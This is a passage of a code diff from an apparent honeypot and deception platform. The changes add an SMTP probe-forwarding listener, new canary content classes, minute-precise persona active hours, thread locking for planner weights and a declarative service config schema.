"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
|
||||||
|
|||||||
@@ -25,6 +25,7 @@ import secrets
|
|||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
|
|
||||||
|
from decnet.bus import topics as _topics
|
||||||
from decnet.bus.factory import get_bus
|
from decnet.bus.factory import get_bus
|
||||||
from decnet.bus.publish import (
|
from decnet.bus.publish import (
|
||||||
publish_safely,
|
publish_safely,
|
||||||
@@ -34,6 +35,7 @@ from decnet.bus.publish import (
|
|||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.orchestrator import events, scheduler
|
from decnet.orchestrator import events, scheduler
|
||||||
from decnet.orchestrator.drivers import get_driver_for
|
from decnet.orchestrator.drivers import get_driver_for
|
||||||
|
from decnet.orchestrator.drivers.smtp_relay import forward_probe
|
||||||
from decnet.orchestrator.emailgen import (
|
from decnet.orchestrator.emailgen import (
|
||||||
events as email_events,
|
events as email_events,
|
||||||
scheduler as email_scheduler,
|
scheduler as email_scheduler,
|
||||||
@@ -138,6 +140,9 @@ async def orchestrator_worker(
|
|||||||
control_task = asyncio.create_task(
|
control_task = asyncio.create_task(
|
||||||
run_control_listener(bus, "orchestrator", shutdown),
|
run_control_listener(bus, "orchestrator", shutdown),
|
||||||
)
|
)
|
||||||
|
probe_task = asyncio.create_task(
|
||||||
|
_run_smtp_probe_listener(repo, shutdown),
|
||||||
|
)
|
||||||
tick_n = 0
|
tick_n = 0
|
||||||
try:
|
try:
|
||||||
while not shutdown.is_set():
|
while not shutdown.is_set():
|
||||||
@@ -157,7 +162,7 @@ async def orchestrator_worker(
|
|||||||
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
|
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
|
||||||
await _refresh_realism_config(repo)
|
await _refresh_realism_config(repo)
|
||||||
finally:
|
finally:
|
||||||
for t in (heartbeat_task, control_task):
|
for t in (heartbeat_task, control_task, probe_task):
|
||||||
t.cancel()
|
t.cancel()
|
||||||
with contextlib.suppress(Exception, asyncio.CancelledError):
|
with contextlib.suppress(Exception, asyncio.CancelledError):
|
||||||
await t
|
await t
|
||||||
@@ -467,6 +472,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
|
|||||||
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
|
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
|
||||||
|
|
||||||
|
|
||||||
|
async def _run_smtp_probe_listener(
|
||||||
|
repo: BaseRepository,
|
||||||
|
shutdown: asyncio.Event,
|
||||||
|
) -> None:
|
||||||
|
"""Subscribe to smtp.probe.pending and forward probe emails upstream.
|
||||||
|
|
||||||
|
Runs as a long-lived subtask alongside the tick loop. When a probe lands
|
||||||
|
we check if this (attacker_ip, decky) has already been forwarded up to
|
||||||
|
probe_limit times — if not, forward via the master's real internet
|
||||||
|
connection and store a probe_relay bounty with the result.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
bus = get_bus(client_name="orchestrator-probe")
|
||||||
|
await bus.connect()
|
||||||
|
sub = bus.subscribe(_topics.smtp("probe.pending"))
|
||||||
|
async with sub:
|
||||||
|
async for event in sub:
|
||||||
|
if shutdown.is_set():
|
||||||
|
break
|
||||||
|
try:
|
||||||
|
await _handle_probe_pending(repo, event.payload)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
logger.warning("smtp probe listener: handle error: %s", exc)
|
||||||
|
except asyncio.CancelledError:
|
||||||
|
raise
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
logger.warning("smtp probe listener: bus unavailable: %s", exc)
|
||||||
|
finally:
|
||||||
|
with contextlib.suppress(Exception):
|
||||||
|
await bus.close()
|
||||||
|
|
||||||
|
|
||||||
|
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
|
||||||
|
decky_name = (payload.get("decky") or "").strip()
|
||||||
|
attacker_ip = (payload.get("attacker_ip") or "").strip()
|
||||||
|
stored_as = (payload.get("stored_as") or "").strip()
|
||||||
|
mail_from = (payload.get("mail_from") or "").strip()
|
||||||
|
rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
|
||||||
|
|
||||||
|
if not (decky_name and attacker_ip and stored_as):
|
||||||
|
return
|
||||||
|
|
||||||
|
decky_row = await repo.get_fleet_decky_by_name(decky_name)
|
||||||
|
if not decky_row:
|
||||||
|
return
|
||||||
|
svc_cfg = (
|
||||||
|
(decky_row.get("decky_config") or {})
|
||||||
|
.get("service_config", {})
|
||||||
|
.get("smtp_relay") or {}
|
||||||
|
)
|
||||||
|
if not (svc_cfg.get("upstream_host") or "").strip():
|
||||||
|
return
|
||||||
|
|
||||||
|
probe_limit = int(svc_cfg.get("probe_limit") or 1)
|
||||||
|
already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
|
||||||
|
if already_sent >= probe_limit:
|
||||||
|
return
|
||||||
|
|
||||||
|
rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
|
||||||
|
artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||||
|
|
||||||
|
loop = asyncio.get_event_loop()
|
||||||
|
ok, reason = await loop.run_in_executor(
|
||||||
|
None,
|
||||||
|
lambda: forward_probe(
|
||||||
|
svc_cfg=svc_cfg,
|
||||||
|
stored_as=stored_as,
|
||||||
|
decky_name=decky_name,
|
||||||
|
mail_from=mail_from,
|
||||||
|
rcpt_to=rcpt_to,
|
||||||
|
artifacts_root=artifacts_root,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
|
||||||
|
await repo.add_bounty({
|
||||||
|
"decky": decky_name,
|
||||||
|
"service": "smtp_relay",
|
||||||
|
"attacker_ip": attacker_ip,
|
||||||
|
"bounty_type": "probe_relay",
|
||||||
|
"payload": {
|
||||||
|
"stored_as": stored_as,
|
||||||
|
"forwarded": ok,
|
||||||
|
**({"fwd_error": reason} if not ok else {}),
|
||||||
|
},
|
||||||
|
})
|
||||||
|
if ok:
|
||||||
|
logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
|
||||||
|
else:
|
||||||
|
logger.warning(
|
||||||
|
"smtp probe forward failed decky=%s ip=%s error=%s",
|
||||||
|
decky_name, attacker_ip, reason,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
async def _record_synthetic_file(repo, action) -> None:
|
async def _record_synthetic_file(repo, action) -> None:
|
||||||
"""Persist (or patch) a synthetic_files row after a FileAction plant.
|
"""Persist (or patch) a synthetic_files row after a FileAction plant.
|
||||||
|
|
||||||
|
|||||||
@@ -25,11 +25,14 @@ from __future__ import annotations
|
|||||||
import asyncio
|
import asyncio
|
||||||
import secrets
|
import secrets
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Callable, Optional
|
from typing import TYPE_CHECKING, Callable, Optional
|
||||||
|
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.realism.taxonomy import ContentClass
|
from decnet.realism.taxonomy import ContentClass
|
||||||
|
|
||||||
|
if TYPE_CHECKING:
|
||||||
|
from decnet.realism.personas import EmailPersona
|
||||||
|
|
||||||
log = get_logger("realism.bodies")
|
log = get_logger("realism.bodies")
|
||||||
|
|
||||||
|
|
||||||
@@ -205,6 +208,9 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
|
|||||||
ContentClass.LOG_DAEMON: _body_log_daemon,
|
ContentClass.LOG_DAEMON: _body_log_daemon,
|
||||||
ContentClass.CACHE_TMP: _body_cache_tmp,
|
ContentClass.CACHE_TMP: _body_cache_tmp,
|
||||||
ContentClass.EMAIL: _body_email,
|
ContentClass.EMAIL: _body_email,
|
||||||
|
# All canary classes share one placeholder — content-class discriminant is the
|
||||||
|
# "what"; the real payload (token slug, DNS hook URL) is injected by the canary
|
||||||
|
# cultivator. Do not replace with distinct generators without updating cultivator.
|
||||||
ContentClass.CANARY_AWS_CREDS: _body_canary,
|
ContentClass.CANARY_AWS_CREDS: _body_canary,
|
||||||
ContentClass.CANARY_ENV_FILE: _body_canary,
|
ContentClass.CANARY_ENV_FILE: _body_canary,
|
||||||
ContentClass.CANARY_GIT_CONFIG: _body_canary,
|
ContentClass.CANARY_GIT_CONFIG: _body_canary,
|
||||||
@@ -213,6 +219,8 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
|
|||||||
ContentClass.CANARY_HONEYDOC_DOCX: _body_canary,
|
ContentClass.CANARY_HONEYDOC_DOCX: _body_canary,
|
||||||
ContentClass.CANARY_HONEYDOC_PDF: _body_canary,
|
ContentClass.CANARY_HONEYDOC_PDF: _body_canary,
|
||||||
ContentClass.CANARY_MYSQL_DUMP: _body_canary,
|
ContentClass.CANARY_MYSQL_DUMP: _body_canary,
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML: _body_canary,
|
||||||
|
ContentClass.CANARY_FINGERPRINT_SVG: _body_canary,
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -240,7 +248,7 @@ def make_body(
|
|||||||
|
|
||||||
async def make_body_with_llm(
|
async def make_body_with_llm(
|
||||||
content_class: ContentClass,
|
content_class: ContentClass,
|
||||||
persona, # EmailPersona — typed loosely to avoid an import cycle
|
persona: "EmailPersona",
|
||||||
*,
|
*,
|
||||||
llm=None, # LLMBackend | None
|
llm=None, # LLMBackend | None
|
||||||
breaker=None, # LLMCircuitBreaker | None
|
breaker=None, # LLMCircuitBreaker | None
|
||||||
|
|||||||
@@ -38,7 +38,7 @@ def _parse_window(window: str) -> tuple[int, int, int, int] | None:
|
|||||||
|
|
||||||
Returns ``None`` for malformed input — callers treat that as
|
Returns ``None`` for malformed input — callers treat that as
|
||||||
"always-on" so a single config typo never silences the whole fleet
|
"always-on" so a single config typo never silences the whole fleet
|
||||||
(mirrors :func:`decnet.realism.personas.in_active_hours` semantics).
|
(:func:`decnet.realism.personas.in_active_hours` delegates here).
|
||||||
"""
|
"""
|
||||||
try:
|
try:
|
||||||
start_s, end_s = window.split("-")
|
start_s, end_s = window.split("-")
|
||||||
|
|||||||
@@ -38,7 +38,7 @@ class FakeBackend(LLMBackend):
|
|||||||
)
|
)
|
||||||
self._success = success
|
self._success = success
|
||||||
|
|
||||||
async def generate(self, prompt: str) -> LLMResult: # noqa: ARG002
|
async def generate(self, _prompt: str) -> LLMResult:
|
||||||
t0 = time.monotonic()
|
t0 = time.monotonic()
|
||||||
latency_ms = int((time.monotonic() - t0) * 1000)
|
latency_ms = int((time.monotonic() - t0) * 1000)
|
||||||
return LLMResult(
|
return LLMResult(
|
||||||
|
|||||||
@@ -159,6 +159,8 @@ _NAMERS: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
|
|||||||
ContentClass.CANARY_HONEYDOC_DOCX: _name_canary,
|
ContentClass.CANARY_HONEYDOC_DOCX: _name_canary,
|
||||||
ContentClass.CANARY_HONEYDOC_PDF: _name_canary,
|
ContentClass.CANARY_HONEYDOC_PDF: _name_canary,
|
||||||
ContentClass.CANARY_MYSQL_DUMP: _name_canary,
|
ContentClass.CANARY_MYSQL_DUMP: _name_canary,
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML: _name_canary,
|
||||||
|
ContentClass.CANARY_FINGERPRINT_SVG: _name_canary,
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -19,11 +19,13 @@ not stall the entire realism tick.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import json
|
import json
|
||||||
|
from datetime import datetime
|
||||||
from typing import Literal, Optional
|
from typing import Literal, Optional
|
||||||
|
|
||||||
from pydantic import BaseModel, Field, ValidationError, field_validator, model_validator
|
from pydantic import BaseModel, Field, ValidationError, field_validator, model_validator
|
||||||
|
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
|
from decnet.realism.diurnal import in_work_hours
|
||||||
|
|
||||||
logger = get_logger("realism.personas")
|
logger = get_logger("realism.personas")
|
||||||
|
|
||||||
@@ -132,22 +134,10 @@ def login_for(persona: str) -> str:
|
|||||||
return "user"
|
return "user"
|
||||||
|
|
||||||
|
|
||||||
def in_active_hours(persona: EmailPersona, now_hour: int) -> bool:
|
def in_active_hours(persona: EmailPersona, now: datetime) -> bool:
|
||||||
"""Return True if *now_hour* (0–23) falls in the persona's window.
|
"""Return True if *now* falls in the persona's active-hours window.
|
||||||
|
|
||||||
Format: ``"HH:MM-HH:MM"``. Wrap-around windows (``"22:00-06:00"``)
|
Delegates to :func:`decnet.realism.diurnal.in_work_hours` so minute
|
||||||
are supported. Invalid windows treat the persona as always-on so a
|
precision is preserved (``"09:30-17:45"`` is honoured correctly).
|
||||||
config typo never silences the whole fleet.
|
|
||||||
"""
|
"""
|
||||||
try:
|
return in_work_hours(persona.active_hours, now)
|
||||||
start_s, end_s = persona.active_hours.split("-")
|
|
||||||
start_h = int(start_s.split(":")[0])
|
|
||||||
end_h = int(end_s.split(":")[0])
|
|
||||||
except (ValueError, IndexError):
|
|
||||||
return True
|
|
||||||
if start_h == end_h:
|
|
||||||
return True
|
|
||||||
if start_h < end_h:
|
|
||||||
return start_h <= now_hour < end_h
|
|
||||||
# Wrap-around (e.g. 22:00-06:00).
|
|
||||||
return now_hour >= start_h or now_hour < end_h
|
|
||||||
|
|||||||
@@ -120,11 +120,19 @@ def load(*, language_default: str = "en") -> list[EmailPersona]:
|
|||||||
logger.warning("realism global pool: read failed path=%s: %s", path, exc)
|
logger.warning("realism global pool: read failed path=%s: %s", path, exc)
|
||||||
return []
|
return []
|
||||||
|
|
||||||
|
# Re-stat after the read so the stored mtime reflects what we actually
|
||||||
|
# parsed — a file change between the initial stat and read would otherwise
|
||||||
|
# cache a stale mtime and suppress the next reload.
|
||||||
|
try:
|
||||||
|
st2 = path.stat()
|
||||||
|
except OSError:
|
||||||
|
st2 = st
|
||||||
|
|
||||||
parsed = parse_personas(raw, language_default=language_default)
|
parsed = parse_personas(raw, language_default=language_default)
|
||||||
with _lock:
|
with _lock:
|
||||||
_cache = parsed
|
_cache = parsed
|
||||||
_cache_path = path
|
_cache_path = path
|
||||||
_cache_mtime = st.st_mtime
|
_cache_mtime = st2.st_mtime
|
||||||
if parsed:
|
if parsed:
|
||||||
logger.info(
|
logger.info(
|
||||||
"realism global pool: loaded %d personas from %s", len(parsed), path,
|
"realism global pool: loaded %d personas from %s", len(parsed), path,
|
||||||
|
|||||||
@@ -20,6 +20,7 @@ persona outside its window is never considered.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import secrets
|
import secrets
|
||||||
|
import threading
|
||||||
from datetime import datetime
|
from datetime import datetime
|
||||||
from typing import Any, Optional, Sequence
|
from typing import Any, Optional, Sequence
|
||||||
|
|
||||||
@@ -62,6 +63,8 @@ _DEFAULT_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = (
|
|||||||
(ContentClass.CANARY_HONEYDOC_DOCX, 1),
|
(ContentClass.CANARY_HONEYDOC_DOCX, 1),
|
||||||
(ContentClass.CANARY_HONEYDOC_PDF, 1),
|
(ContentClass.CANARY_HONEYDOC_PDF, 1),
|
||||||
(ContentClass.CANARY_MYSQL_DUMP, 1),
|
(ContentClass.CANARY_MYSQL_DUMP, 1),
|
||||||
|
(ContentClass.CANARY_FINGERPRINT_HTML, 1),
|
||||||
|
(ContentClass.CANARY_FINGERPRINT_SVG, 1),
|
||||||
)
|
)
|
||||||
_DEFAULT_CANARY_PROBABILITY = 0.03
|
_DEFAULT_CANARY_PROBABILITY = 0.03
|
||||||
|
|
||||||
@@ -72,6 +75,7 @@ _USER_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_USER_CLASS_
|
|||||||
_SYSTEM_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_SYSTEM_CLASS_WEIGHTS
|
_SYSTEM_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_SYSTEM_CLASS_WEIGHTS
|
||||||
_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_CANARY_CLASS_WEIGHTS
|
_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_CANARY_CLASS_WEIGHTS
|
||||||
_CANARY_PROBABILITY: float = _DEFAULT_CANARY_PROBABILITY
|
_CANARY_PROBABILITY: float = _DEFAULT_CANARY_PROBABILITY
|
||||||
|
_planner_lock = threading.Lock()
|
||||||
|
|
||||||
|
|
||||||
def _serialize_weights(
|
def _serialize_weights(
|
||||||
@@ -82,12 +86,15 @@ def _serialize_weights(
|
|||||||
|
|
||||||
def _parse_weights(
|
def _parse_weights(
|
||||||
raw: Any, allowed: set[ContentClass],
|
raw: Any, allowed: set[ContentClass],
|
||||||
) -> tuple[tuple[ContentClass, int], ...]:
|
) -> tuple[tuple[tuple[ContentClass, int], ...], list[str]]:
|
||||||
"""Parse ``[{"content_class": "...", "weight": N}, ...]`` into the
|
"""Parse ``[{"content_class": "...", "weight": N}, ...]`` into the
|
||||||
planner's internal tuple shape. Drops entries whose ``content_class``
|
planner's internal tuple shape.
|
||||||
isn't in *allowed* (defends against an operator pasting in a canary
|
|
||||||
class on the user list, which would skew sampling without the
|
Returns ``(weights, dropped)`` where *dropped* is the list of
|
||||||
canary-probability gate).
|
``content_class`` values that were valid enum members but not in
|
||||||
|
*allowed* (e.g. a canary class pasted onto the user list). Callers
|
||||||
|
surface *dropped* in the API response so the operator can see the
|
||||||
|
entry didn't land without having to re-read the config.
|
||||||
|
|
||||||
Raises ``ValueError`` on structural problems (non-list, non-int
|
Raises ``ValueError`` on structural problems (non-list, non-int
|
||||||
weight, negative weight, empty result) so the API can return 400.
|
weight, negative weight, empty result) so the API can return 400.
|
||||||
@@ -95,6 +102,7 @@ def _parse_weights(
|
|||||||
if not isinstance(raw, list):
|
if not isinstance(raw, list):
|
||||||
raise ValueError("weights must be a list")
|
raise ValueError("weights must be a list")
|
||||||
out: list[tuple[ContentClass, int]] = []
|
out: list[tuple[ContentClass, int]] = []
|
||||||
|
dropped: list[str] = []
|
||||||
for entry in raw:
|
for entry in raw:
|
||||||
if not isinstance(entry, dict):
|
if not isinstance(entry, dict):
|
||||||
raise ValueError("each weight entry must be an object")
|
raise ValueError("each weight entry must be an object")
|
||||||
@@ -111,18 +119,14 @@ def _parse_weights(
|
|||||||
except (ValueError, TypeError):
|
except (ValueError, TypeError):
|
||||||
raise ValueError(f"unknown content_class: {cls_name!r}")
|
raise ValueError(f"unknown content_class: {cls_name!r}")
|
||||||
if cls not in allowed:
|
if cls not in allowed:
|
||||||
# Silently drop — a class that doesn't belong on this list
|
dropped.append(cls.value)
|
||||||
# (e.g. a canary class on the user list) is operator error,
|
|
||||||
# but we don't want to fail the whole save over one stray
|
|
||||||
# entry. The roundtrip in current_payload() will show the
|
|
||||||
# operator their entry didn't land.
|
|
||||||
continue
|
continue
|
||||||
out.append((cls, weight))
|
out.append((cls, weight))
|
||||||
if not out:
|
if not out:
|
||||||
raise ValueError("weights list resolved to zero valid entries")
|
raise ValueError("weights list resolved to zero valid entries")
|
||||||
if sum(w for _, w in out) <= 0:
|
if sum(w for _, w in out) <= 0:
|
||||||
raise ValueError("weights must sum to a positive number")
|
raise ValueError("weights must sum to a positive number")
|
||||||
return tuple(out)
|
return tuple(out), dropped
|
||||||
|
|
||||||
|
|
||||||
_USER_CLASSES: set[ContentClass] = {
|
_USER_CLASSES: set[ContentClass] = {
|
||||||
@@ -136,6 +140,7 @@ _CANARY_CLASSES: set[ContentClass] = {
|
|||||||
ContentClass.CANARY_GIT_CONFIG, ContentClass.CANARY_SSH_KEY,
|
ContentClass.CANARY_GIT_CONFIG, ContentClass.CANARY_SSH_KEY,
|
||||||
ContentClass.CANARY_HONEYDOC, ContentClass.CANARY_HONEYDOC_DOCX,
|
ContentClass.CANARY_HONEYDOC, ContentClass.CANARY_HONEYDOC_DOCX,
|
||||||
ContentClass.CANARY_HONEYDOC_PDF, ContentClass.CANARY_MYSQL_DUMP,
|
ContentClass.CANARY_HONEYDOC_PDF, ContentClass.CANARY_MYSQL_DUMP,
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML, ContentClass.CANARY_FINGERPRINT_SVG,
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -151,15 +156,21 @@ def current_payload() -> dict[str, Any]:
|
|||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
def apply_payload(payload: dict[str, Any]) -> None:
|
def apply_payload(payload: dict[str, Any]) -> list[str]:
|
||||||
"""Override the planner's live globals from a wire payload.
|
"""Override the planner's live globals from a wire payload.
|
||||||
|
|
||||||
Validates structurally and rebinds module-level names atomically
|
Validates structurally and rebinds module-level names atomically
|
||||||
per field — partial failures don't leave the planner in a torn
|
per field — partial failures don't leave the planner in a torn
|
||||||
state because validation happens before any rebind.
|
state because validation happens before any rebind.
|
||||||
|
|
||||||
|
Returns the list of ``content_class`` values that were dropped
|
||||||
|
because they didn't belong on their target list (e.g. a canary
|
||||||
|
class on the user list). Callers should surface this in the API
|
||||||
|
response so operators know their entry didn't land.
|
||||||
|
|
||||||
Unknown fields are ignored (forward-compat); fields not present
|
Unknown fields are ignored (forward-compat); fields not present
|
||||||
leave the corresponding global untouched."""
|
leave the corresponding global untouched.
|
||||||
|
"""
|
||||||
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
|
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
|
||||||
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
|
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
|
||||||
|
|
||||||
@@ -167,37 +178,45 @@ def apply_payload(payload: dict[str, Any]) -> None:
|
|||||||
new_system = _SYSTEM_CLASS_WEIGHTS
|
new_system = _SYSTEM_CLASS_WEIGHTS
|
||||||
new_canary = _CANARY_CLASS_WEIGHTS
|
new_canary = _CANARY_CLASS_WEIGHTS
|
||||||
new_prob = _CANARY_PROBABILITY
|
new_prob = _CANARY_PROBABILITY
|
||||||
|
all_dropped: list[str] = []
|
||||||
|
|
||||||
if "user_class_weights" in payload:
|
if "user_class_weights" in payload:
|
||||||
new_user = _parse_weights(payload["user_class_weights"], _USER_CLASSES)
|
new_user, dropped = _parse_weights(payload["user_class_weights"], _USER_CLASSES)
|
||||||
|
all_dropped.extend(dropped)
|
||||||
if "system_class_weights" in payload:
|
if "system_class_weights" in payload:
|
||||||
new_system = _parse_weights(
|
new_system, dropped = _parse_weights(
|
||||||
payload["system_class_weights"], _SYSTEM_CLASSES,
|
payload["system_class_weights"], _SYSTEM_CLASSES,
|
||||||
)
|
)
|
||||||
|
all_dropped.extend(dropped)
|
||||||
if "canary_class_weights" in payload:
|
if "canary_class_weights" in payload:
|
||||||
new_canary = _parse_weights(
|
new_canary, dropped = _parse_weights(
|
||||||
payload["canary_class_weights"], _CANARY_CLASSES,
|
payload["canary_class_weights"], _CANARY_CLASSES,
|
||||||
)
|
)
|
||||||
|
all_dropped.extend(dropped)
|
||||||
if "canary_probability" in payload:
|
if "canary_probability" in payload:
|
||||||
prob = payload["canary_probability"]
|
prob = payload["canary_probability"]
|
||||||
if not isinstance(prob, (int, float)) or not (0.0 <= prob <= 1.0):
|
if not isinstance(prob, (int, float)) or not (0.0 <= prob <= 1.0):
|
||||||
raise ValueError("canary_probability must be in [0.0, 1.0]")
|
raise ValueError("canary_probability must be in [0.0, 1.0]")
|
||||||
new_prob = float(prob)
|
new_prob = float(prob)
|
||||||
|
|
||||||
_USER_CLASS_WEIGHTS = new_user
|
with _planner_lock:
|
||||||
_SYSTEM_CLASS_WEIGHTS = new_system
|
_USER_CLASS_WEIGHTS = new_user
|
||||||
_CANARY_CLASS_WEIGHTS = new_canary
|
_SYSTEM_CLASS_WEIGHTS = new_system
|
||||||
_CANARY_PROBABILITY = new_prob
|
_CANARY_CLASS_WEIGHTS = new_canary
|
||||||
|
_CANARY_PROBABILITY = new_prob
|
||||||
|
|
||||||
|
return all_dropped
|
||||||
|
|
||||||
|
|
||||||
def reset_to_defaults() -> None:
|
def reset_to_defaults() -> None:
|
||||||
"""Restore hardcoded defaults. Used by tests and the API reset path."""
|
"""Restore hardcoded defaults. Used by tests and the API reset path."""
|
||||||
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
|
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
|
||||||
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
|
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
|
||||||
_USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS
|
with _planner_lock:
|
||||||
_SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS
|
_USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS
|
||||||
_CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS
|
_SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS
|
||||||
_CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY
|
_CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS
|
||||||
|
_CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY
|
||||||
|
|
||||||
|
|
||||||
def _weighted_pick(
|
def _weighted_pick(
|
||||||
|
|||||||
@@ -62,6 +62,8 @@ class ContentClass(StrEnum):
|
|||||||
CANARY_HONEYDOC_DOCX = "canary_honeydoc_docx"
|
CANARY_HONEYDOC_DOCX = "canary_honeydoc_docx"
|
||||||
CANARY_HONEYDOC_PDF = "canary_honeydoc_pdf"
|
CANARY_HONEYDOC_PDF = "canary_honeydoc_pdf"
|
||||||
CANARY_MYSQL_DUMP = "canary_mysql_dump"
|
CANARY_MYSQL_DUMP = "canary_mysql_dump"
|
||||||
|
CANARY_FINGERPRINT_HTML = "canary_fingerprint_html"
|
||||||
|
CANARY_FINGERPRINT_SVG = "canary_fingerprint_svg"
|
||||||
|
|
||||||
def is_canary(self) -> bool:
|
def is_canary(self) -> bool:
|
||||||
return self.value.startswith("canary_")
|
return self.value.startswith("canary_")
|
||||||
|
|||||||
@@ -1,5 +1,47 @@
|
|||||||
|
import base64
|
||||||
|
import binascii
|
||||||
from abc import ABC, abstractmethod
|
from abc import ABC, abstractmethod
|
||||||
|
from dataclasses import asdict, dataclass
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
from typing import Any, Literal
|
||||||
|
|
||||||
|
# Sentinel prefix used by the deploy wizard to ship multi-line textarea values
|
||||||
|
# through ConfigParser without relying on its multi-line continuation syntax.
|
||||||
|
# Plain raw values without the prefix are accepted as-is so direct API
|
||||||
|
# submitters (PUT /…/services/{svc}/config) keep working with raw strings.
|
||||||
|
TEXTAREA_B64_PREFIX = "b64:"
|
||||||
|
|
||||||
|
FieldType = Literal["string", "password", "int", "bool", "textarea", "enum"]
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass(frozen=True)
|
||||||
|
class ServiceConfigField:
|
||||||
|
"""
|
||||||
|
Declarative descriptor for one user-editable knob on a service.
|
||||||
|
|
||||||
|
The Inspector form (Fleet + MazeNET) renders inputs from this metadata,
|
||||||
|
and BaseService.validate_cfg coerces submitted values against it.
|
||||||
|
"""
|
||||||
|
|
||||||
|
key: str
|
||||||
|
label: str
|
||||||
|
type: FieldType = "string"
|
||||||
|
default: Any = None
|
||||||
|
secret: bool = False
|
||||||
|
help: str | None = None
|
||||||
|
enum: list[str] | None = None
|
||||||
|
placeholder: str | None = None
|
||||||
|
|
||||||
|
def to_json(self) -> dict:
|
||||||
|
d = asdict(self)
|
||||||
|
# Frontend doesn't need a None enum dangling on non-enum fields
|
||||||
|
if self.enum is None:
|
||||||
|
d.pop("enum", None)
|
||||||
|
return d
|
||||||
|
|
||||||
|
|
||||||
|
class ConfigValidationError(ValueError):
|
||||||
|
"""Raised when a submitted service_cfg value cannot be coerced to its declared type."""
|
||||||
|
|
||||||
|
|
||||||
class BaseService(ABC):
|
class BaseService(ABC):
|
||||||
@@ -15,6 +57,10 @@ class BaseService(ABC):
|
|||||||
default_image: str # Docker image tag, or "build" if a Dockerfile is needed
|
default_image: str # Docker image tag, or "build" if a Dockerfile is needed
|
||||||
fleet_singleton: bool = False # True = runs once fleet-wide, not per-decky
|
fleet_singleton: bool = False # True = runs once fleet-wide, not per-decky
|
||||||
|
|
||||||
|
# Per-service customizable fields exposed to the Inspector UI.
|
||||||
|
# Subclasses override; default empty -> "No customizable fields".
|
||||||
|
config_schema: list[ServiceConfigField] = []
|
||||||
|
|
||||||
@abstractmethod
|
@abstractmethod
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
@@ -41,3 +87,63 @@ class BaseService(ABC):
|
|||||||
image built. Return None if default_image is used directly.
|
image built. Return None if default_image is used directly.
|
||||||
"""
|
"""
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
def validate_cfg(self, cfg: dict | None) -> dict:
|
||||||
|
"""
|
||||||
|
Coerce a user-submitted dict against this service's config_schema.
|
||||||
|
|
||||||
|
Unknown keys are silently dropped. Declared keys are coerced to their
|
||||||
|
declared type (raising ConfigValidationError on bad values). Empty
|
||||||
|
strings on optional fields drop the key entirely so compose_fragment's
|
||||||
|
